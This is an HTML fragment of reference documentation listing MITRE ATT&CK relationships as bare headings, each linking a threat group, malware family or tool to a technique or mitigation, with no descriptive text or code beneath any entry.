<h3 id="_net_s0039_uses_system_time_discovery_t1124"><a class="anchor" href="#_net_s0039_uses_system_time_discovery_t1124"></a><a class="link" href="#_net_s0039_uses_system_time_discovery_t1124">Net (S0039) uses System Time Discovery (T1124)</a></h3>
</div>
<div class="sect2">
<h3 id="_distributed_component_object_model_mitigation_t1175_mitigates_distributed_component_object_model_t1175"><a class="anchor" href="#_distributed_component_object_model_mitigation_t1175_mitigates_distributed_component_object_model_t1175"></a><a class="link" href="#_distributed_component_object_model_mitigation_t1175_mitigates_distributed_component_object_model_t1175">Distributed Component Object Model Mitigation (T1175) mitigates Distributed Component Object Model (T1175)</a></h3>
</div>
<div class="sect2">
<h3 id="_chopstick_s0023_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_chopstick_s0023_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_chopstick_s0023_uses_standard_cryptographic_protocol_t1032">CHOPSTICK (S0023) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin6_g0037_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_fin6_g0037_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_fin6_g0037_uses_standard_application_layer_protocol_t1071">FIN6 (G0037) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_shotput_s0063_uses_account_discovery_t1087"><a class="anchor" href="#_shotput_s0063_uses_account_discovery_t1087"></a><a class="link" href="#_shotput_s0063_uses_account_discovery_t1087">SHOTPUT (S0063) uses Account Discovery (T1087)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin7_g0046_uses_scheduled_task_t1053"><a class="anchor" href="#_fin7_g0046_uses_scheduled_task_t1053"></a><a class="link" href="#_fin7_g0046_uses_scheduled_task_t1053">FIN7 (G0046) uses Scheduled Task (T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_mimikatz_s0002_uses_account_manipulation_t1098"><a class="anchor" href="#_mimikatz_s0002_uses_account_manipulation_t1098"></a><a class="link" href="#_mimikatz_s0002_uses_account_manipulation_t1098">Mimikatz (S0002) uses Account Manipulation (T1098)</a></h3>
</div>
<div class="sect2">
<h3 id="_skeleton_key_s0007_uses_account_manipulation_t1098"><a class="anchor" href="#_skeleton_key_s0007_uses_account_manipulation_t1098"></a><a class="link" href="#_skeleton_key_s0007_uses_account_manipulation_t1098">Skeleton Key (S0007) uses Account Manipulation (T1098)</a></h3>
</div>
<div class="sect2">
<h3 id="_daserf_s0187_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_daserf_s0187_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_daserf_s0187_uses_obfuscated_files_or_information_t1027">Daserf (S0187) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_gsecdump_s0008"><a class="anchor" href="#_apt1_g0006_uses_gsecdump_s0008"></a><a class="link" href="#_apt1_g0006_uses_gsecdump_s0008">APT1 (G0006) uses gsecdump (S0008)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt32_g0050_uses_cobalt_strike_s0154"><a class="anchor" href="#_apt32_g0050_uses_cobalt_strike_s0154"></a><a class="link" href="#_apt32_g0050_uses_cobalt_strike_s0154">APT32 (G0050) uses Cobalt Strike (S0154)</a></h3>
</div>
<div class="sect2">
<h3 id="_xagentosx_s0161_uses_peripheral_device_discovery_t1120"><a class="anchor" href="#_xagentosx_s0161_uses_peripheral_device_discovery_t1120"></a><a class="link" href="#_xagentosx_s0161_uses_peripheral_device_discovery_t1120">XAgentOSX (S0161) uses Peripheral Device Discovery (T1120)</a></h3>
</div>
<div class="sect2">
<h3 id="_advstoreshell_s0045_uses_input_capture_t1056"><a class="anchor" href="#_advstoreshell_s0045_uses_input_capture_t1056"></a><a class="link" href="#_advstoreshell_s0045_uses_input_capture_t1056">ADVSTORESHELL (S0045) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_wingbird_s0176_uses_process_injection_t1055"><a class="anchor" href="#_wingbird_s0176_uses_process_injection_t1055"></a><a class="link" href="#_wingbird_s0176_uses_process_injection_t1055">Wingbird (S0176) uses Process Injection (T1055)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_dll_side_loading_t1073"><a class="anchor" href="#_apt3_g0022_uses_dll_side_loading_t1073"></a><a class="link" href="#_apt3_g0022_uses_dll_side_loading_t1073">APT3 (G0022) uses DLL Side-Loading (T1073)</a></h3>
</div>
<div class="sect2">
<h3 id="_hi_zor_s0087_uses_commonly_used_port_t1043"><a class="anchor" href="#_hi_zor_s0087_uses_commonly_used_port_t1043"></a><a class="link" href="#_hi_zor_s0087_uses_commonly_used_port_t1043">Hi-Zor (S0087) uses Commonly Used Port (T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_file_deletion_t1107"><a class="anchor" href="#_apt28_g0007_uses_file_deletion_t1107"></a><a class="link" href="#_apt28_g0007_uses_file_deletion_t1107">APT28 (G0007) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_lowball_s0042_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_lowball_s0042_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_lowball_s0042_uses_standard_application_layer_protocol_t1071">LOWBALL (S0042) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_derusbi_s0021_uses_custom_cryptographic_protocol_t1024"><a class="anchor" href="#_derusbi_s0021_uses_custom_cryptographic_protocol_t1024"></a><a class="link" href="#_derusbi_s0021_uses_custom_cryptographic_protocol_t1024">Derusbi (S0021) uses Custom Cryptographic Protocol (T1024)</a></h3>
</div>
<div class="sect2">
<h3 id="_zlib_s0086_uses_new_service_t1050"><a class="anchor" href="#_zlib_s0086_uses_new_service_t1050"></a><a class="link" href="#_zlib_s0086_uses_new_service_t1050">ZLib (S0086) uses New Service (T1050)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin10_g0051_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_fin10_g0051_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_fin10_g0051_uses_registry_run_keys_start_folder_t1060">FIN10 (G0051) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt29_g0016_uses_cosmicduke_s0050"><a class="anchor" href="#_apt29_g0016_uses_cosmicduke_s0050"></a><a class="link" href="#_apt29_g0016_uses_cosmicduke_s0050">APT29 (G0016) uses CosmicDuke (S0050)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_data_from_local_system_t1005"><a class="anchor" href="#_cobalt_strike_s0154_uses_data_from_local_system_t1005"></a><a class="link" href="#_cobalt_strike_s0154_uses_data_from_local_system_t1005">Cobalt Strike (S0154) uses Data from Local System (T1005)</a></h3>
</div>
<div class="sect2">
<h3 id="_duqu_s0038_uses_process_injection_t1055"><a class="anchor" href="#_duqu_s0038_uses_process_injection_t1055"></a><a class="link" href="#_duqu_s0038_uses_process_injection_t1055">Duqu (S0038) uses Process Injection (T1055)</a></h3>
</div>
<div class="sect2">
<h3 id="_emissary_s0082_uses_new_service_t1050"><a class="anchor" href="#_emissary_s0082_uses_new_service_t1050"></a><a class="link" href="#_emissary_s0082_uses_new_service_t1050">Emissary (S0082) uses New Service (T1050)</a></h3>
</div>
<div class="sect2">
<h3 id="_regin_s0019_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_regin_s0019_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_regin_s0019_uses_standard_application_layer_protocol_t1071">Regin (S0019) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_windshield_s0155_uses_query_registry_t1012"><a class="anchor" href="#_windshield_s0155_uses_query_registry_t1012"></a><a class="link" href="#_windshield_s0155_uses_query_registry_t1012">WINDSHIELD (S0155) uses Query Registry (T1012)</a></h3>
</div>
<div class="sect2">
<h3 id="_stealth_falcon_g0038_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_stealth_falcon_g0038_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_stealth_falcon_g0038_uses_standard_application_layer_protocol_t1071">Stealth Falcon (G0038) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_prikormka_s0113_uses_credential_dumping_t1003"><a class="anchor" href="#_prikormka_s0113_uses_credential_dumping_t1003"></a><a class="link" href="#_prikormka_s0113_uses_credential_dumping_t1003">Prikormka (S0113) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_ftp_s0095_uses_commonly_used_port_t1043"><a class="anchor" href="#_ftp_s0095_uses_commonly_used_port_t1043"></a><a class="link" href="#_ftp_s0095_uses_commonly_used_port_t1043">FTP (S0095) uses Commonly Used Port (T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt29_g0016_uses_pass_the_hash_t1075"><a class="anchor" href="#_apt29_g0016_uses_pass_the_hash_t1075"></a><a class="link" href="#_apt29_g0016_uses_pass_the_hash_t1075">APT29 (G0016) uses Pass the Hash (T1075)</a></h3>
</div>
<div class="sect2">
<h3 id="_remsec_s0125_uses_system_network_connections_discovery_t1049"><a class="anchor" href="#_remsec_s0125_uses_system_network_connections_discovery_t1049"></a><a class="link" href="#_remsec_s0125_uses_system_network_connections_discovery_t1049">Remsec (S0125) uses System Network Connections Discovery (T1049)</a></h3>
</div>
<div class="sect2">
<h3 id="_remsec_s0125_uses_exploitation_of_vulnerability_t1068"><a class="anchor" href="#_remsec_s0125_uses_exploitation_of_vulnerability_t1068"></a><a class="link" href="#_remsec_s0125_uses_exploitation_of_vulnerability_t1068">Remsec (S0125) uses Exploitation of Vulnerability (T1068)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt29_g0016_uses_miniduke_s0051"><a class="anchor" href="#_apt29_g0016_uses_miniduke_s0051"></a><a class="link" href="#_apt29_g0016_uses_miniduke_s0051">APT29 (G0016) uses MiniDuke (S0051)</a></h3>
</div>
<div class="sect2">
<h3 id="_mimikatz_s0002_uses_private_keys_t1145"><a class="anchor" href="#_mimikatz_s0002_uses_private_keys_t1145"></a><a class="link" href="#_mimikatz_s0002_uses_private_keys_t1145">Mimikatz (S0002) uses Private Keys (T1145)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_pwdump_s0006"><a class="anchor" href="#_menupass_g0045_uses_pwdump_s0006"></a><a class="link" href="#_menupass_g0045_uses_pwdump_s0006">menuPass (G0045) uses pwdump (S0006)</a></h3>
</div>
<div class="sect2">
<h3 id="_isminjector_s0189_uses_process_hollowing_t1093"><a class="anchor" href="#_isminjector_s0189_uses_process_hollowing_t1093"></a><a class="link" href="#_isminjector_s0189_uses_process_hollowing_t1093">ISMInjector (S0189) uses Process Hollowing (T1093)</a></h3>
</div>
<div class="sect2">
<h3 id="_darkhotel_g0012_uses_replication_through_removable_media_t1091"><a class="anchor" href="#_darkhotel_g0012_uses_replication_through_removable_media_t1091"></a><a class="link" href="#_darkhotel_g0012_uses_replication_through_removable_media_t1091">Darkhotel (G0012) uses Replication Through Removable Media (T1091)</a></h3>
</div>
<div class="sect2">
<h3 id="_oldbait_s0138_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_oldbait_s0138_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_oldbait_s0138_uses_obfuscated_files_or_information_t1027">OLDBAIT (S0138) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_remsec_s0125_uses_password_filter_dll_t1174"><a class="anchor" href="#_remsec_s0125_uses_password_filter_dll_t1174"></a><a class="link" href="#_remsec_s0125_uses_password_filter_dll_t1174">Remsec (S0125) uses Password Filter DLL (T1174)</a></h3>
</div>
<div class="sect2">
<h3 id="_blackcoffee_s0069_uses_file_deletion_t1107"><a class="anchor" href="#_blackcoffee_s0069_uses_file_deletion_t1107"></a><a class="link" href="#_blackcoffee_s0069_uses_file_deletion_t1107">BLACKCOFFEE (S0069) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_xcmd_s0123"><a class="anchor" href="#_apt1_g0006_uses_xcmd_s0123"></a><a class="link" href="#_apt1_g0006_uses_xcmd_s0123">APT1 (G0006) uses xCmd (S0123)</a></h3>
</div>
<div class="sect2">
<h3 id="_streamex_s0142_uses_rundll32_t1085"><a class="anchor" href="#_streamex_s0142_uses_rundll32_t1085"></a><a class="link" href="#_streamex_s0142_uses_rundll32_t1085">StreamEx (S0142) uses Rundll32 (T1085)</a></h3>
</div>
<div class="sect2">
<h3 id="_duqu_s0038_uses_data_obfuscation_t1001"><a class="anchor" href="#_duqu_s0038_uses_data_obfuscation_t1001"></a><a class="link" href="#_duqu_s0038_uses_data_obfuscation_t1001">Duqu (S0038) uses Data Obfuscation (T1001)</a></h3>
</div>
<div class="sect2">
<h3 id="_sudo_mitigation_t1169_mitigates_sudo_t1169"><a class="anchor" href="#_sudo_mitigation_t1169_mitigates_sudo_t1169"></a><a class="link" href="#_sudo_mitigation_t1169_mitigates_sudo_t1169">Sudo Mitigation (T1169) mitigates Sudo (T1169)</a></h3>
</div>
<div class="sect2">
<h3 id="_commonly_used_port_mitigation_t1043_mitigates_commonly_used_port_t1043"><a class="anchor" href="#_commonly_used_port_mitigation_t1043_mitigates_commonly_used_port_t1043"></a><a class="link" href="#_commonly_used_port_mitigation_t1043_mitigates_commonly_used_port_t1043">Commonly Used Port Mitigation (T1043) mitigates Commonly Used Port (T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_pteranodon_s0147_uses_remote_file_copy_t1105"><a class="anchor" href="#_pteranodon_s0147_uses_remote_file_copy_t1105"></a><a class="link" href="#_pteranodon_s0147_uses_remote_file_copy_t1105">Pteranodon (S0147) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_matroyshka_s0167_uses_input_capture_t1056"><a class="anchor" href="#_matroyshka_s0167_uses_input_capture_t1056"></a><a class="link" href="#_matroyshka_s0167_uses_input_capture_t1056">Matroyshka (S0167) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_data_staged_t1074"><a class="anchor" href="#_threat_group_3390_g0027_uses_data_staged_t1074"></a><a class="link" href="#_threat_group_3390_g0027_uses_data_staged_t1074">Threat Group-3390 (G0027) uses Data Staged (T1074)</a></h3>
</div>
<div class="sect2">
<h3 id="_komprogo_s0156_uses_command_line_interface_t1059"><a class="anchor" href="#_komprogo_s0156_uses_command_line_interface_t1059"></a><a class="link" href="#_komprogo_s0156_uses_command_line_interface_t1059">KOMPROGO (S0156) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_powruner_s0184_uses_permission_groups_discovery_t1069"><a class="anchor" href="#_powruner_s0184_uses_permission_groups_discovery_t1069"></a><a class="link" href="#_powruner_s0184_uses_permission_groups_discovery_t1069">POWRUNER (S0184) uses Permission Groups Discovery (T1069)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_xtunnel_s0117"><a class="anchor" href="#_apt28_g0007_uses_xtunnel_s0117"></a><a class="link" href="#_apt28_g0007_uses_xtunnel_s0117">APT28 (G0007) uses XTunnel (S0117)</a></h3>
</div>
<div class="sect2">
<h3 id="_h1n1_s0132_uses_software_packing_t1045"><a class="anchor" href="#_h1n1_s0132_uses_software_packing_t1045"></a><a class="link" href="#_h1n1_s0132_uses_software_packing_t1045">H1N1 (S0132) uses Software Packing (T1045)</a></h3>
</div>
<div class="sect2">
<h3 id="_admin_338_g0018_uses_masquerading_t1036"><a class="anchor" href="#_admin_338_g0018_uses_masquerading_t1036"></a><a class="link" href="#_admin_338_g0018_uses_masquerading_t1036">admin@338 (G0018) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_httpbrowser_s0070"><a class="anchor" href="#_threat_group_3390_g0027_uses_httpbrowser_s0070"></a><a class="link" href="#_threat_group_3390_g0027_uses_httpbrowser_s0070">Threat Group-3390 (G0027) uses HTTPBrowser (S0070)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_multiband_communication_t1026"><a class="anchor" href="#_cobalt_strike_s0154_uses_multiband_communication_t1026"></a><a class="link" href="#_cobalt_strike_s0154_uses_multiband_communication_t1026">Cobalt Strike (S0154) uses Multiband Communication (T1026)</a></h3>
</div>
<div class="sect2">
<h3 id="_exfiltration_over_alternative_protocol_mitigation_t1048_mitigates_exfiltration_over_alternative_protocol_t1048"><a class="anchor" href="#_exfiltration_over_alternative_protocol_mitigation_t1048_mitigates_exfiltration_over_alternative_protocol_t1048"></a><a class="link" href="#_exfiltration_over_alternative_protocol_mitigation_t1048_mitigates_exfiltration_over_alternative_protocol_t1048">Exfiltration Over Alternative Protocol Mitigation (T1048) mitigates Exfiltration Over Alternative Protocol (T1048)</a></h3>
</div>
<div class="sect2">
<h3 id="_backspace_s0031_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_backspace_s0031_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_backspace_s0031_uses_standard_application_layer_protocol_t1071">BACKSPACE (S0031) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_prikormka_s0113_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_prikormka_s0113_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_prikormka_s0113_uses_file_and_directory_discovery_t1083">Prikormka (S0113) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_owaauth_s0072_uses_data_encrypted_t1022"><a class="anchor" href="#_owaauth_s0072_uses_data_encrypted_t1022"></a><a class="link" href="#_owaauth_s0072_uses_data_encrypted_t1022">OwaAuth (S0072) uses Data Encrypted (T1022)</a></h3>
</div>
<div class="sect2">
<h3 id="_p2p_zeus_s0016_uses_data_obfuscation_t1001"><a class="anchor" href="#_p2p_zeus_s0016_uses_data_obfuscation_t1001"></a><a class="link" href="#_p2p_zeus_s0016_uses_data_obfuscation_t1001">P2P ZeuS (S0016) uses Data Obfuscation (T1001)</a></h3>
</div>
<div class="sect2">
<h3 id="_wingbird_s0176_uses_new_service_t1050"><a class="anchor" href="#_wingbird_s0176_uses_new_service_t1050"></a><a class="link" href="#_wingbird_s0176_uses_new_service_t1050">Wingbird (S0176) uses New Service (T1050)</a></h3>
</div>
<div class="sect2">
<h3 id="_seaduke_s0053_uses_pass_the_ticket_t1097"><a class="anchor" href="#_seaduke_s0053_uses_pass_the_ticket_t1097"></a><a class="link" href="#_seaduke_s0053_uses_pass_the_ticket_t1097">SeaDuke (S0053) uses Pass the Ticket (T1097)</a></h3>
</div>
<div class="sect2">
<h3 id="_reaver_s0172_uses_file_deletion_t1107"><a class="anchor" href="#_reaver_s0172_uses_file_deletion_t1107"></a><a class="link" href="#_reaver_s0172_uses_file_deletion_t1107">Reaver (S0172) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_stealth_falcon_g0038_uses_exfiltration_over_command_and_control_channel_t1041"><a class="anchor" href="#_stealth_falcon_g0038_uses_exfiltration_over_command_and_control_channel_t1041"></a><a class="link" href="#_stealth_falcon_g0038_uses_exfiltration_over_command_and_control_channel_t1041">Stealth Falcon (G0038) uses Exfiltration Over Command and Control Channel (T1041)</a></h3>
</div>
<div class="sect2">
<h3 id="_shortcut_modification_mitigation_t1023_mitigates_shortcut_modification_t1023"><a class="anchor" href="#_shortcut_modification_mitigation_t1023_mitigates_shortcut_modification_t1023"></a><a class="link" href="#_shortcut_modification_mitigation_t1023_mitigates_shortcut_modification_t1023">Shortcut Modification Mitigation (T1023) mitigates Shortcut Modification (T1023)</a></h3>
</div>
<div class="sect2">
<h3 id="_blackenergy_s0089_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_blackenergy_s0089_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_blackenergy_s0089_uses_standard_application_layer_protocol_t1071">BlackEnergy (S0089) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_netsh_s0108_uses_security_software_discovery_t1063"><a class="anchor" href="#_netsh_s0108_uses_security_software_discovery_t1063"></a><a class="link" href="#_netsh_s0108_uses_security_software_discovery_t1063">netsh (S0108) uses Security Software Discovery (T1063)</a></h3>
</div>
<div class="sect2">
<h3 id="_powerduke_s0139_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_powerduke_s0139_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_powerduke_s0139_uses_registry_run_keys_start_folder_t1060">PowerDuke (S0139) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_prikormka_s0113_uses_data_encoding_t1132"><a class="anchor" href="#_prikormka_s0113_uses_data_encoding_t1132"></a><a class="link" href="#_prikormka_s0113_uses_data_encoding_t1132">Prikormka (S0113) uses Data Encoding (T1132)</a></h3>
</div>
<div class="sect2">
<h3 id="_pteranodon_s0147_uses_data_staged_t1074"><a class="anchor" href="#_pteranodon_s0147_uses_data_staged_t1074"></a><a class="link" href="#_pteranodon_s0147_uses_data_staged_t1074">Pteranodon (S0147) uses Data Staged (T1074)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_data_staged_t1074"><a class="anchor" href="#_lazarus_group_g0032_uses_data_staged_t1074"></a><a class="link" href="#_lazarus_group_g0032_uses_data_staged_t1074">Lazarus Group (G0032) uses Data Staged (T1074)</a></h3>
</div>
<div class="sect2">
<h3 id="_gsecdump_s0008_uses_credential_dumping_t1003"><a class="anchor" href="#_gsecdump_s0008_uses_credential_dumping_t1003"></a><a class="link" href="#_gsecdump_s0008_uses_credential_dumping_t1003">gsecdump (S0008) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin6_g0037_uses_data_encrypted_t1022"><a class="anchor" href="#_fin6_g0037_uses_data_encrypted_t1022"></a><a class="link" href="#_fin6_g0037_uses_data_encrypted_t1022">FIN6 (G0037) uses Data Encrypted (T1022)</a></h3>
</div>
<div class="sect2">
<h3 id="_backspace_s0031_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_backspace_s0031_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_backspace_s0031_uses_file_and_directory_discovery_t1083">BACKSPACE (S0031) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_web_service_mitigation_t1102_mitigates_web_service_t1102"><a class="anchor" href="#_web_service_mitigation_t1102_mitigates_web_service_t1102"></a><a class="link" href="#_web_service_mitigation_t1102_mitigates_web_service_t1102">Web Service Mitigation (T1102) mitigates Web Service (T1102)</a></h3>
</div>
<div class="sect2">
<h3 id="_pngdowner_s0067_uses_file_deletion_t1107"><a class="anchor" href="#_pngdowner_s0067_uses_file_deletion_t1107"></a><a class="link" href="#_pngdowner_s0067_uses_file_deletion_t1107">pngdowner (S0067) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt29_g0016_uses_windows_management_instrumentation_t1047"><a class="anchor" href="#_apt29_g0016_uses_windows_management_instrumentation_t1047"></a><a class="link" href="#_apt29_g0016_uses_windows_management_instrumentation_t1047">APT29 (G0016) uses Windows Management Instrumentation (T1047)</a></h3>
</div>
<div class="sect2">
<h3 id="_badnews_s0128_uses_command_line_interface_t1059"><a class="anchor" href="#_badnews_s0128_uses_command_line_interface_t1059"></a><a class="link" href="#_badnews_s0128_uses_command_line_interface_t1059">BADNEWS (S0128) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_tdtess_s0164_uses_new_service_t1050"><a class="anchor" href="#_tdtess_s0164_uses_new_service_t1050"></a><a class="link" href="#_tdtess_s0164_uses_new_service_t1050">TDTESS (S0164) uses New Service (T1050)</a></h3>
</div>
<div class="sect2">
<h3 id="_valid_accounts_mitigation_t1078_mitigates_valid_accounts_t1078"><a class="anchor" href="#_valid_accounts_mitigation_t1078_mitigates_valid_accounts_t1078"></a><a class="link" href="#_valid_accounts_mitigation_t1078_mitigates_valid_accounts_t1078">Valid Accounts Mitigation (T1078) mitigates Valid Accounts (T1078)</a></h3>
</div>
<div class="sect2">
<h3 id="_turla_g0010_uses_net_s0039"><a class="anchor" href="#_turla_g0010_uses_net_s0039"></a><a class="link" href="#_turla_g0010_uses_net_s0039">Turla (G0010) uses Net (S0039)</a></h3>
</div>
<div class="sect2">
<h3 id="_sykipot_s0018_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_sykipot_s0018_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_sykipot_s0018_uses_registry_run_keys_start_folder_t1060">Sykipot (S0018) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_route_s0103_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_route_s0103_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_route_s0103_uses_system_network_configuration_discovery_t1016">route (S0103) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_credential_dumping_t1003"><a class="anchor" href="#_menupass_g0045_uses_credential_dumping_t1003"></a><a class="link" href="#_menupass_g0045_uses_credential_dumping_t1003">menuPass (G0045) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt34_g0057_uses_powruner_s0184"><a class="anchor" href="#_apt34_g0057_uses_powruner_s0184"></a><a class="link" href="#_apt34_g0057_uses_powruner_s0184">APT34 (G0057) uses POWRUNER (S0184)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_file_deletion_t1107"><a class="anchor" href="#_apt3_g0022_uses_file_deletion_t1107"></a><a class="link" href="#_apt3_g0022_uses_file_deletion_t1107">APT3 (G0022) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_mobileorder_s0079_uses_remote_file_copy_t1105"><a class="anchor" href="#_mobileorder_s0079_uses_remote_file_copy_t1105"></a><a class="link" href="#_mobileorder_s0079_uses_remote_file_copy_t1105">MobileOrder (S0079) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_windows_management_instrumentation_t1047"><a class="anchor" href="#_lazarus_group_g0032_uses_windows_management_instrumentation_t1047"></a><a class="link" href="#_lazarus_group_g0032_uses_windows_management_instrumentation_t1047">Lazarus Group (G0032) uses Windows Management Instrumentation (T1047)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_scripting_t1064"><a class="anchor" href="#_cobalt_strike_s0154_uses_scripting_t1064"></a><a class="link" href="#_cobalt_strike_s0154_uses_scripting_t1064">Cobalt Strike (S0154) uses Scripting (T1064)</a></h3>
</div>
<div class="sect2">
<h3 id="_emissary_s0082_uses_binary_padding_t1009"><a class="anchor" href="#_emissary_s0082_uses_binary_padding_t1009"></a><a class="link" href="#_emissary_s0082_uses_binary_padding_t1009">Emissary (S0082) uses Binary Padding (T1009)</a></h3>
</div>
<div class="sect2">
<h3 id="_sowbug_g0054_uses_system_information_discovery_t1082"><a class="anchor" href="#_sowbug_g0054_uses_system_information_discovery_t1082"></a><a class="link" href="#_sowbug_g0054_uses_system_information_discovery_t1082">Sowbug (G0054) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_elise_s0081_uses_timestomp_t1099"><a class="anchor" href="#_elise_s0081_uses_timestomp_t1099"></a><a class="link" href="#_elise_s0081_uses_timestomp_t1099">Elise (S0081) uses Timestomp (T1099)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_indicator_removal_from_tools_t1066"><a class="anchor" href="#_apt3_g0022_uses_indicator_removal_from_tools_t1066"></a><a class="link" href="#_apt3_g0022_uses_indicator_removal_from_tools_t1066">APT3 (G0022) uses Indicator Removal from Tools (T1066)</a></h3>
</div>
<div class="sect2">
<h3 id="_volgmer_s0180_uses_commonly_used_port_t1043"><a class="anchor" href="#_volgmer_s0180_uses_commonly_used_port_t1043"></a><a class="link" href="#_volgmer_s0180_uses_commonly_used_port_t1043">Volgmer (S0180) uses Commonly Used Port (T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_night_dragon_g0014_uses_software_packing_t1045"><a class="anchor" href="#_night_dragon_g0014_uses_software_packing_t1045"></a><a class="link" href="#_night_dragon_g0014_uses_software_packing_t1045">Night Dragon (G0014) uses Software Packing (T1045)</a></h3>
</div>
<div class="sect2">
<h3 id="_cosmicduke_s0050_uses_data_from_network_shared_drive_t1039"><a class="anchor" href="#_cosmicduke_s0050_uses_data_from_network_shared_drive_t1039"></a><a class="link" href="#_cosmicduke_s0050_uses_data_from_network_shared_drive_t1039">CosmicDuke (S0050) uses Data from Network Shared Drive (T1039)</a></h3>
</div>
<div class="sect2">
<h3 id="_matroyshka_s0167_uses_screen_capture_t1113"><a class="anchor" href="#_matroyshka_s0167_uses_screen_capture_t1113"></a><a class="link" href="#_matroyshka_s0167_uses_screen_capture_t1113">Matroyshka (S0167) uses Screen Capture (T1113)</a></h3>
</div>
<div class="sect2">
<h3 id="_sowbug_g0054_uses_data_from_network_shared_drive_t1039"><a class="anchor" href="#_sowbug_g0054_uses_data_from_network_shared_drive_t1039"></a><a class="link" href="#_sowbug_g0054_uses_data_from_network_shared_drive_t1039">Sowbug (G0054) uses Data from Network Shared Drive (T1039)</a></h3>
</div>
<div class="sect2">
